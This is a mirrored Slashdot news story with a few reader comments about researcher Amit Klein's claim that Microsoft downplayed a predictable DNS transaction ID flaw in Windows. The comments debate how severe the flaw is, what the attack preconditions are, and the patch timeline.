Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Downplaying Recent DNS Vulnerability

Posted by kdawson on from the it's-nothing-really dept.

Microsoft Watch writes "Microsoft downplays a recent DNS vulnerability in all Microsoft operating systems (XP, Vista, 2000, and 2003), claims Amit Klein, the security researcher who published the original vulnerability description (PDF) earlier this month. According to Klein, the description in Microsoft's Secure Windows Initiative blog entry is misleading, contains disinformation about the DNS transaction ID algorithm, and downplays the severity of the issue. Klein refutes Microsoft's claim that there is no way to reproduce the next transaction ID, given a series of observed transaction IDs. He shows that this is possible in his paper, which Microsoft had before publishing the SWI post, as well as on the series of data provided in the SWI blog itself."

5 of 93 comments (clear)

  1. Re:Unlikely, but... by Uncle+Focker · · Score: 5, Insightful

    Or rather than spending all that effort in trying to downplay it, they could just fix the vulnerability and stop all the would-be attackers in their tracks. Nah, that would make too much sense.

  2. Okay, I don't get the issue here. by ThreeGigs · · Score: 5, Informative

    Reading TFA and the details on the vulnerability, it seems to me that the attacker must first be able to sniff packets being sent to the DNS server from the desktop PC. This means the attacker apparently must have access to the network the desktop is on.

    Now, forgive me if I'm missing the obvious, but why would an attacker, *who can read an outgoing request to a DNS server in real time*, not simply craft a reply using the outgoing packet data as a model? Why bother figuring out the transaction ID when an attacker, according to the scenarios given, *should already have it*, having gotten it from the sniffed packet.

    I just don't see how being predictable makes this any worse, when you're apparently dealing with someone already on your own network, or on the route between you and your DNS server.

  3. Why is this news? by IchBinEinPenguin · · Score: 5, Insightful

    $DUDE finds vulnerability in $PRODUCT made by $VENDOR.
    $DUDE claims this is really serious and should be fixed at once.
    (optional) $DUDE does the Right Thing and tells $VENDOR about it so they can fix it before he goes public.
    $VENDOR replies that $DUDE's claims are overblown.
    Flamewar on /., lots of page hits, lots of add revenue, PROFIT!!
    (optional, much later) $VENDOR quietly fixes $PRODUCT.

  4. RTFA by magamiako1 · · Score: 5, Informative
    Article Conclusion:

    April 30th, 2007 - Microsoft Security Response Center (MSRC) were informed of this issue.

    March 18th, 2008 - Microsoft releases a service pack for Windows Vista (Vista SP1), which includes a fix for this issue.

    April 8th, 2008 - Microsoft issues a fix ([19]) for Windows Vista, Windows XP SP2, Windows 2003 and Windows 2000 SP4. The fix is downloadable at Microsoftâ(TM)s website. Simultaneously, Trusteer discloses the vulnerability to the public (in the form of this document).

    Also, as stated above, the scenarios required to pull this off are pointless. If someone is sniffing your traffic in your switched network, they already have access to your network that could invoke far more problems than simple DNS poisoning.

  5. Re:Unlikely, but... by Divebus · · Score: 5, Funny

    Is it possible that Microsoft was downplaying it to lessen the effects? Microsoft will certainly take security to the next level:
      "Are you sure you want to poison the DNS stub resolver cache? Allow or Deny."
    That'll fix it.
    --

    Most of the stuff on /. won't survive first contact with facts.